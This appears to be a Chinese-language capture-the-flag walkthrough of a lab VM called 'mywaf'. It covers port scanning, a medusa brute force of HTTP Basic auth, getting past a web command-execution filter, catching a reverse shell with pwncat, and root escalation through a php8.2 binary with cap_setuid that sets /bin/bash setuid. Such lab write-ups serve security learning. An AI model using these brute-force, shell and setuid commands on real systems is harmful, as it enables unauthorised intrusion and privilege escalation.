信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.211  08:00:27:ec:12:5f       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e5:e5:eb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.094 seconds (122.25 hosts/sec). 4 responded
❯ export ip=192.168.60.211
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports like it's my full-time job. Wait, it is.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.211:22
Open 192.168.60.211:80
Open 192.168.60.211:3306
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-26 21:19 CST
Initiating ARP Ping Scan at 21:19
Scanning 192.168.60.211 [1 port]
Completed ARP Ping Scan at 21:19, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:19
Completed Parallel DNS resolution of 1 host. at 21:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:19
Scanning 192.168.60.211 [3 ports]
Discovered open port 3306/tcp on 192.168.60.211
Discovered open port 22/tcp on 192.168.60.211
Discovered open port 80/tcp on 192.168.60.211
Completed SYN Stealth Scan at 21:19, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.211
Host is up, received arp-response (0.00036s latency).
Scanned at 2025-02-26 21:19:01 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
3306/tcp open  mysql   syn-ack ttl 64
MAC Address: 08:00:27:EC:12:5F (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

浏览器访问一下80端口，编辑hosts添加一下域名

1
2
3

❯ sudo vim /etc/hosts
[sudo] password for Pepster:
192.168.60.211  www.mywaf.nyx

入口

发现有个注册的表单

注册成功后

又两个新的域名，添加一下

1 2	❯ sudo vim /etc/hosts 192.168.60.211 www.mywaf.nyx maintenance.mywaf.nyx configure.mywaf.nyx

可以执行命令

不过当我反弹shell则会报错403未授权

可能是waf给拦截了吧，不允许出现关键字nc之类的

我发现好像不能出现空格-|;&之类拼接的字符

我尝试了很多，无果

Authorization Basic爆破

换个方向

在configure.mywaf.nyx 域名中，要求登录

直接爆破，hydra会出错用medusa好了

这里用burpsuite也行，看个人习惯

得到凭证admin:security

❯ medusa  -h configure.mywaf.nyx -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M http -m DIR:/ -T 10 -f -v 04
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT FOUND: [http] Host: configure.mywaf.nyx User: admin Password: security [SUCCESS]

登陆一下

发现好像可以改等级之类的

猜测应该是修改命令执行的检测严格程度吧

给他改成Nivel 3

发现命令执行中可以输入空格了，不过还是有一些不能输入

利用busybox反弹一下shell

用户提权

监听一下端口，得知用户nohydragent

❯ pwncat-cs -lp 4444
[22:08:44] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[22:08:47] received connection from 192.168.60.211:51074                                                                                    bind.py:84
[22:08:48] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
           192.168.60.211:51074: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@mywaf:/var/www/maintenance.mywaf.nyx$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
nohydragent:x:1000:1000:,,,:/home/nohydragent:/bin/bash

Root提权

发现php8.2存在cap_setuid=ep的能力

而且文件还是root所属

(remote) www-data@mywaf:/tmp$ getcap -r /
/opt/phps/php8.2 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
(remote) www-data@mywaf:/tmp$ ls -al /opt/phps/
total 5532
drwxr-xr-x 2 root root    4096 Jun 19  2024 .
drwxr-xr-x 3 root root    4096 Jun 19  2024 ..
-rwxr-xr-x 1 root root 5654232 Jun 19  2024 php8.2

利用php的能力提权即可

注意要利用/opt/phps目录下的php，不然你是没权限的

(remote) www-data@mywaf:/opt/phps$ php8.2 -r "posix_setuid(0); system('chmod +s /bin/bash');"
chmod: changing permissions of '/bin/bash': Operation not permitted
(remote) www-data@mywaf:/opt/phps$ which php8.2
/usr/bin/php8.2
(remote) www-data@mywaf:/opt/phps$ ./php8.2 -r "posix_setuid(0); system('chmod +s /bin/bash');"
(remote) www-data@mywaf:/opt/phps$ bash -p
(remote) root@mywaf:/opt/phps# whoami
root
(remote) root@mywaf:/opt/phps# cat /root/root.txt
0fe16399c94ba69bc4e499d85b1b27d7
(remote) root@mywaf:/opt/phps# cat /home/nohydragent/user.txt
219074c9ca90fe6fe025e7eb4e67b3bf